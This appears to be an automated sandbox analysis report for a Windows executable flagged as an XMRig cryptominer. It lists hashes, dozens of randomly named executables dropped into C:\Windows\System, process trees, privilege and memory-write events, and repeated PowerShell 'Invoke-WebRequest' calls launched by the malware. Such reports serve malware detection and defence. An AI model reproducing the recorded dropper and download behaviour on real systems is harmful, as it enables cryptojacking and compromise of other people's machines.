xmrig | 749ebfe548172995dec447360ac2dcbc53db826c674fac2a8d39c2a44dfecb12

Analysis

max time kernel
16s
max time network
149s
platform
windows7_x64
resource
win7v20210410
submitted
05-05-2021 11:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e8d8d2cb_by_Libranalysis.exe
Size

1.6MB
MD5

e8d8d2cb809674275e397d3096ee0e3b
SHA1

0a7f8d3ff4d7b22bfbfcaeab6191f0be0644ccd9
SHA256

749ebfe548172995dec447360ac2dcbc53db826c674fac2a8d39c2a44dfecb12
SHA512

70ff16e3a8ce12c0591b2bb9d8acaf1f1b6f5512d10831cf85ab5b4f3b460b8b6b140a7eecd1aeb0ef1c405de90c0c56db445ff1d2b97360203c58134dcdba9a

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 60 IoCs

miner

Processes:

resource	yara_rule
\Windows\system\kpCJEjz.exe	xmrig
C:\Windows\system\kpCJEjz.exe	xmrig
\Windows\system\wCCbrIS.exe	xmrig
\Windows\system\KRezRnc.exe	xmrig
C:\Windows\system\YlrDWPn.exe	xmrig
C:\Windows\system\wCCbrIS.exe	xmrig
\Windows\system\YlrDWPn.exe	xmrig
\Windows\system\xzemvHk.exe	xmrig
C:\Windows\system\xzemvHk.exe	xmrig
C:\Windows\system\uBwtTbs.exe	xmrig
\Windows\system\uxTwfjN.exe	xmrig
C:\Windows\system\KRezRnc.exe	xmrig
\Windows\system\uBwtTbs.exe	xmrig
\Windows\system\GMduHcM.exe	xmrig
\Windows\system\cvYElOS.exe	xmrig
C:\Windows\system\LrkOQvY.exe	xmrig
C:\Windows\system\uxTwfjN.exe	xmrig
\Windows\system\IqFpiOX.exe	xmrig
\Windows\system\LrkOQvY.exe	xmrig
C:\Windows\system\GMduHcM.exe	xmrig
C:\Windows\system\cvYElOS.exe	xmrig
\Windows\system\MbRuryf.exe	xmrig
C:\Windows\system\FUUIzOA.exe	xmrig
C:\Windows\system\MbRuryf.exe	xmrig
\Windows\system\TrOJgyO.exe	xmrig
C:\Windows\system\HoZTZtS.exe	xmrig
\Windows\system\isrcLic.exe	xmrig
\Windows\system\sdkMRzE.exe	xmrig
C:\Windows\system\isrcLic.exe	xmrig
C:\Windows\system\DBADADF.exe	xmrig
\Windows\system\DBADADF.exe	xmrig
C:\Windows\system\TrOJgyO.exe	xmrig
\Windows\system\HoZTZtS.exe	xmrig
\Windows\system\FUUIzOA.exe	xmrig
C:\Windows\system\IqFpiOX.exe	xmrig
C:\Windows\system\sdkMRzE.exe	xmrig
\Windows\system\VitttSG.exe	xmrig
C:\Windows\system\GqCUrub.exe	xmrig
C:\Windows\system\VitttSG.exe	xmrig
C:\Windows\system\ILOfGqd.exe	xmrig
\Windows\system\ILOfGqd.exe	xmrig
\Windows\system\GqCUrub.exe	xmrig
\Windows\system\eyIRMuD.exe	xmrig
\Windows\system\ochkuap.exe	xmrig
C:\Windows\system\eyIRMuD.exe	xmrig
C:\Windows\system\ochkuap.exe	xmrig
\Windows\system\BkpbJeA.exe	xmrig
C:\Windows\system\BkpbJeA.exe	xmrig
\Windows\system\nHPajtU.exe	xmrig
C:\Windows\system\nHPajtU.exe	xmrig
C:\Windows\system\VlRZgwr.exe	xmrig
\Windows\system\CLZGZLL.exe	xmrig
\Windows\system\VlRZgwr.exe	xmrig
C:\Windows\system\CLZGZLL.exe	xmrig
\Windows\system\RQQdcok.exe	xmrig
\Windows\system\dOTJawA.exe	xmrig
C:\Windows\system\dOTJawA.exe	xmrig
\Windows\system\jYzHJZR.exe	xmrig
C:\Windows\system\RQQdcok.exe	xmrig
C:\Windows\system\jYzHJZR.exe	xmrig

Executes dropped EXE 64 IoCs

Processes:

kpCJEjz.exewCCbrIS.exeYlrDWPn.exexzemvHk.exeKRezRnc.exeuBwtTbs.exeuxTwfjN.exeLrkOQvY.exeIqFpiOX.exeGMduHcM.execvYElOS.exeFUUIzOA.exeMbRuryf.exeHoZTZtS.exeTrOJgyO.exeisrcLic.exeDBADADF.exesdkMRzE.exeGqCUrub.exeVitttSG.exeILOfGqd.exeeyIRMuD.exeochkuap.exeBkpbJeA.exenHPajtU.exeVlRZgwr.exeCLZGZLL.exeRQQdcok.exedOTJawA.exejYzHJZR.exeQhZDqEy.exeqFoYVgD.exehYprFdm.exeZVNRBHz.exeUraOoDW.exeLyLhbTn.exeObadjqA.exePwviUSf.exeLfukXhI.exexXJEdQn.exeChPAFKb.exeURIDPbr.exefFSctOt.exewKYDsEo.exeILBsjED.exeuTiRIAc.exeJCOEbbO.exetrMBKQR.exeeYcNrFb.exeGyPnkXp.exeWNKNINp.exegyRgTAH.exeOvykZaI.exewYSBTus.exeCWnqRZb.exeAgXiazJ.exeYKfqNAU.exeqYSRxkC.exebRgdKYn.exepXQaFEg.exepRaSlIY.exeIImXlxR.exeoOhLbvA.exetcCkFMD.exe

pid	process
1164	kpCJEjz.exe
1120	wCCbrIS.exe
1936	YlrDWPn.exe
1784	xzemvHk.exe
1684	KRezRnc.exe
1520	uBwtTbs.exe
1588	uxTwfjN.exe
644	LrkOQvY.exe
288	IqFpiOX.exe
1772	GMduHcM.exe
1168	cvYElOS.exe
1796	FUUIzOA.exe
1628	MbRuryf.exe
1720	HoZTZtS.exe
268	TrOJgyO.exe
1716	isrcLic.exe
1844	DBADADF.exe
1060	sdkMRzE.exe
1608	GqCUrub.exe
1532	VitttSG.exe
1144	ILOfGqd.exe
1904	eyIRMuD.exe
2064	ochkuap.exe
2112	BkpbJeA.exe
2156	nHPajtU.exe
2232	VlRZgwr.exe
2316	CLZGZLL.exe
2344	RQQdcok.exe
2380	dOTJawA.exe
2432	jYzHJZR.exe
2472	QhZDqEy.exe
2496	qFoYVgD.exe
2540	hYprFdm.exe
2552	ZVNRBHz.exe
2572	UraOoDW.exe
2632	LyLhbTn.exe
2652	ObadjqA.exe
2704	PwviUSf.exe
2736	LfukXhI.exe
2744	xXJEdQn.exe
2768	ChPAFKb.exe
2800	URIDPbr.exe
2196	fFSctOt.exe
3156	wKYDsEo.exe
3232	ILBsjED.exe
3248	uTiRIAc.exe
3264	JCOEbbO.exe
3280	trMBKQR.exe
3296	eYcNrFb.exe
3240	GyPnkXp.exe
3256	WNKNINp.exe
3272	gyRgTAH.exe
3288	OvykZaI.exe
3352	wYSBTus.exe
3416	CWnqRZb.exe
3432	AgXiazJ.exe
3448	YKfqNAU.exe
3464	qYSRxkC.exe
3480	bRgdKYn.exe
3424	pXQaFEg.exe
3440	pRaSlIY.exe
3456	IImXlxR.exe
3544	oOhLbvA.exe
3560	tcCkFMD.exe

Loads dropped DLL 64 IoCs

Processes:

e8d8d2cb_by_Libranalysis.exe

pid	process
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe
1100	e8d8d2cb_by_Libranalysis.exe

Drops file in Windows directory 64 IoCs

Processes:

e8d8d2cb_by_Libranalysis.exe

description	ioc	process
File created	C:\Windows\System\uBwtTbs.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\QhZDqEy.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\xXJEdQn.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\ChPAFKb.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\AsEfkMj.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\BkpbJeA.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\UraOoDW.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\GMduHcM.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\isrcLic.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\eyIRMuD.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\dOTJawA.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\JCOEbbO.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\trMBKQR.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\YKfqNAU.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\oOhLbvA.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\gIZbSZP.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\LfukXhI.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\uTiRIAc.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\WNKNINp.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\gyRgTAH.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\qYSRxkC.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\LrkOQvY.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\TrOJgyO.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\ObadjqA.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\bRgdKYn.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\Frjmusu.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\KRezRnc.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\VlRZgwr.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\URIDPbr.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\AgXiazJ.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\DmptugK.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\kpCJEjz.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\YlrDWPn.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\IqFpiOX.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\HoZTZtS.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\ochkuap.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\nHPajtU.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\CLZGZLL.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\OvykZaI.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\pXQaFEg.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\GwbfQkI.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\xzemvHk.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\ILBsjED.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\pRaSlIY.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\IImXlxR.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\zgyNlkp.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\wCCbrIS.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\FUUIzOA.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\MbRuryf.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\PwviUSf.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\eYcNrFb.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\wYSBTus.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\cvYElOS.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\RQQdcok.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\GqCUrub.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\VitttSG.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\ZVNRBHz.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\jYzHJZR.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\CWnqRZb.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\kNXGkTk.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\DBADADF.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\ILOfGqd.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\qFoYVgD.exe	e8d8d2cb_by_Libranalysis.exe
File created	C:\Windows\System\hYprFdm.exe	e8d8d2cb_by_Libranalysis.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
836	powershell.exe
1732	powershell.exe
1780	powershell.exe
1432	powershell.exe
1632	powershell.exe
1536	powershell.exe
340	powershell.exe
1632	powershell.exe
1732	powershell.exe
1780	powershell.exe
836	powershell.exe
1432	powershell.exe
1536	powershell.exe
340	powershell.exe
2960	powershell.exe
2776	powershell.exe
2144	powershell.exe
3388	powershell.exe
3000	powershell.exe
2512	powershell.exe
2820	powershell.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	836	powershell.exe
Token: SeDebugPrivilege	1732	powershell.exe
Token: SeDebugPrivilege	1780	powershell.exe
Token: SeDebugPrivilege	1432	powershell.exe
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeDebugPrivilege	340	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeDebugPrivilege	2144	powershell.exe
Token: SeDebugPrivilege	3388	powershell.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	2512	powershell.exe
Token: SeDebugPrivilege	2820	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e8d8d2cb_by_Libranalysis.exekpCJEjz.exewCCbrIS.exeYlrDWPn.exeKRezRnc.exexzemvHk.exeuBwtTbs.exeLrkOQvY.exeuxTwfjN.exe

description	pid	process	target process
PID 1100 wrote to memory of 836	1100	e8d8d2cb_by_Libranalysis.exe	powershell.exe
PID 1100 wrote to memory of 836	1100	e8d8d2cb_by_Libranalysis.exe	powershell.exe
PID 1100 wrote to memory of 836	1100	e8d8d2cb_by_Libranalysis.exe	powershell.exe
PID 1100 wrote to memory of 1164	1100	e8d8d2cb_by_Libranalysis.exe	kpCJEjz.exe
PID 1100 wrote to memory of 1164	1100	e8d8d2cb_by_Libranalysis.exe	kpCJEjz.exe
PID 1100 wrote to memory of 1164	1100	e8d8d2cb_by_Libranalysis.exe	kpCJEjz.exe
PID 1100 wrote to memory of 1120	1100	e8d8d2cb_by_Libranalysis.exe	wCCbrIS.exe
PID 1100 wrote to memory of 1120	1100	e8d8d2cb_by_Libranalysis.exe	wCCbrIS.exe
PID 1100 wrote to memory of 1120	1100	e8d8d2cb_by_Libranalysis.exe	wCCbrIS.exe
PID 1100 wrote to memory of 1936	1100	e8d8d2cb_by_Libranalysis.exe	YlrDWPn.exe
PID 1100 wrote to memory of 1936	1100	e8d8d2cb_by_Libranalysis.exe	YlrDWPn.exe
PID 1100 wrote to memory of 1936	1100	e8d8d2cb_by_Libranalysis.exe	YlrDWPn.exe
PID 1100 wrote to memory of 1784	1100	e8d8d2cb_by_Libranalysis.exe	xzemvHk.exe
PID 1100 wrote to memory of 1784	1100	e8d8d2cb_by_Libranalysis.exe	xzemvHk.exe
PID 1100 wrote to memory of 1784	1100	e8d8d2cb_by_Libranalysis.exe	xzemvHk.exe
PID 1164 wrote to memory of 1732	1164	kpCJEjz.exe	powershell.exe
PID 1164 wrote to memory of 1732	1164	kpCJEjz.exe	powershell.exe
PID 1164 wrote to memory of 1732	1164	kpCJEjz.exe	powershell.exe
PID 1120 wrote to memory of 1780	1120	wCCbrIS.exe	powershell.exe
PID 1120 wrote to memory of 1780	1120	wCCbrIS.exe	powershell.exe
PID 1120 wrote to memory of 1780	1120	wCCbrIS.exe	powershell.exe
PID 1100 wrote to memory of 1684	1100	e8d8d2cb_by_Libranalysis.exe	KRezRnc.exe
PID 1100 wrote to memory of 1684	1100	e8d8d2cb_by_Libranalysis.exe	KRezRnc.exe
PID 1100 wrote to memory of 1684	1100	e8d8d2cb_by_Libranalysis.exe	KRezRnc.exe
PID 1936 wrote to memory of 1432	1936	YlrDWPn.exe	powershell.exe
PID 1936 wrote to memory of 1432	1936	YlrDWPn.exe	powershell.exe
PID 1936 wrote to memory of 1432	1936	YlrDWPn.exe	powershell.exe
PID 1100 wrote to memory of 1520	1100	e8d8d2cb_by_Libranalysis.exe	uBwtTbs.exe
PID 1100 wrote to memory of 1520	1100	e8d8d2cb_by_Libranalysis.exe	uBwtTbs.exe
PID 1100 wrote to memory of 1520	1100	e8d8d2cb_by_Libranalysis.exe	uBwtTbs.exe
PID 1100 wrote to memory of 1588	1100	e8d8d2cb_by_Libranalysis.exe	uxTwfjN.exe
PID 1100 wrote to memory of 1588	1100	e8d8d2cb_by_Libranalysis.exe	uxTwfjN.exe
PID 1100 wrote to memory of 1588	1100	e8d8d2cb_by_Libranalysis.exe	uxTwfjN.exe
PID 1684 wrote to memory of 1632	1684	KRezRnc.exe	powershell.exe
PID 1684 wrote to memory of 1632	1684	KRezRnc.exe	powershell.exe
PID 1684 wrote to memory of 1632	1684	KRezRnc.exe	powershell.exe
PID 1784 wrote to memory of 1536	1784	xzemvHk.exe	powershell.exe
PID 1784 wrote to memory of 1536	1784	xzemvHk.exe	powershell.exe
PID 1784 wrote to memory of 1536	1784	xzemvHk.exe	powershell.exe
PID 1100 wrote to memory of 644	1100	e8d8d2cb_by_Libranalysis.exe	LrkOQvY.exe
PID 1100 wrote to memory of 644	1100	e8d8d2cb_by_Libranalysis.exe	LrkOQvY.exe
PID 1100 wrote to memory of 644	1100	e8d8d2cb_by_Libranalysis.exe	LrkOQvY.exe
PID 1100 wrote to memory of 288	1100	e8d8d2cb_by_Libranalysis.exe	IqFpiOX.exe
PID 1100 wrote to memory of 288	1100	e8d8d2cb_by_Libranalysis.exe	IqFpiOX.exe
PID 1100 wrote to memory of 288	1100	e8d8d2cb_by_Libranalysis.exe	IqFpiOX.exe
PID 1520 wrote to memory of 1204	1520	uBwtTbs.exe	powershell.exe
PID 1520 wrote to memory of 1204	1520	uBwtTbs.exe	powershell.exe
PID 1520 wrote to memory of 1204	1520	uBwtTbs.exe	powershell.exe
PID 644 wrote to memory of 340	644	LrkOQvY.exe	powershell.exe
PID 644 wrote to memory of 340	644	LrkOQvY.exe	powershell.exe
PID 644 wrote to memory of 340	644	LrkOQvY.exe	powershell.exe
PID 1588 wrote to memory of 1044	1588	uxTwfjN.exe	powershell.exe
PID 1588 wrote to memory of 1044	1588	uxTwfjN.exe	powershell.exe
PID 1588 wrote to memory of 1044	1588	uxTwfjN.exe	powershell.exe
PID 1100 wrote to memory of 1168	1100	e8d8d2cb_by_Libranalysis.exe	cvYElOS.exe
PID 1100 wrote to memory of 1168	1100	e8d8d2cb_by_Libranalysis.exe	cvYElOS.exe
PID 1100 wrote to memory of 1168	1100	e8d8d2cb_by_Libranalysis.exe	cvYElOS.exe
PID 1100 wrote to memory of 1772	1100	e8d8d2cb_by_Libranalysis.exe	GMduHcM.exe
PID 1100 wrote to memory of 1772	1100	e8d8d2cb_by_Libranalysis.exe	GMduHcM.exe
PID 1100 wrote to memory of 1772	1100	e8d8d2cb_by_Libranalysis.exe	GMduHcM.exe
PID 1100 wrote to memory of 1796	1100	e8d8d2cb_by_Libranalysis.exe	FUUIzOA.exe
PID 1100 wrote to memory of 1796	1100	e8d8d2cb_by_Libranalysis.exe	FUUIzOA.exe
PID 1100 wrote to memory of 1796	1100	e8d8d2cb_by_Libranalysis.exe	FUUIzOA.exe
PID 1100 wrote to memory of 1628	1100	e8d8d2cb_by_Libranalysis.exe	MbRuryf.exe

C:\Users\Admin\AppData\Local\Temp\e8d8d2cb_by_Libranalysis.exe
"C:\Users\Admin\AppData\Local\Temp\e8d8d2cb_by_Libranalysis.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:836

C:\Windows\System\kpCJEjz.exe
C:\Windows\System\kpCJEjz.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1164

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1732

C:\Windows\System\wCCbrIS.exe
C:\Windows\System\wCCbrIS.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1120

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1780

C:\Windows\System\YlrDWPn.exe
C:\Windows\System\YlrDWPn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1432

C:\Windows\System\xzemvHk.exe
C:\Windows\System\xzemvHk.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1536

C:\Windows\System\KRezRnc.exe
C:\Windows\System\KRezRnc.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632

C:\Windows\System\uBwtTbs.exe
C:\Windows\System\uBwtTbs.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:1204

C:\Windows\System\uxTwfjN.exe
C:\Windows\System\uxTwfjN.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:1044

C:\Windows\System\LrkOQvY.exe
C:\Windows\System\LrkOQvY.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:340

C:\Windows\System\IqFpiOX.exe
C:\Windows\System\IqFpiOX.exe
2⤵
- Executes dropped EXE
PID:288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:1416

C:\Windows\System\GMduHcM.exe
C:\Windows\System\GMduHcM.exe
2⤵
- Executes dropped EXE
PID:1772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:1640

C:\Windows\System\FUUIzOA.exe
C:\Windows\System\FUUIzOA.exe
2⤵
- Executes dropped EXE
PID:1796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2164

C:\Windows\System\cvYElOS.exe
C:\Windows\System\cvYElOS.exe
2⤵
- Executes dropped EXE
PID:1168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2204

C:\Windows\System\MbRuryf.exe
C:\Windows\System\MbRuryf.exe
2⤵
- Executes dropped EXE
PID:1628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2104

C:\Windows\System\TrOJgyO.exe
C:\Windows\System\TrOJgyO.exe
2⤵
- Executes dropped EXE
PID:268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2144

C:\Windows\System\DBADADF.exe
C:\Windows\System\DBADADF.exe
2⤵
- Executes dropped EXE
PID:1844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2372

C:\Windows\System\GqCUrub.exe
C:\Windows\System\GqCUrub.exe
2⤵
- Executes dropped EXE
PID:1608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2364

C:\Windows\System\sdkMRzE.exe
C:\Windows\System\sdkMRzE.exe
2⤵
- Executes dropped EXE
PID:1060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2256

C:\Windows\System\isrcLic.exe
C:\Windows\System\isrcLic.exe
2⤵
- Executes dropped EXE
PID:1716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:2416

C:\Windows\System\HoZTZtS.exe
C:\Windows\System\HoZTZtS.exe
2⤵
- Executes dropped EXE
PID:1720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
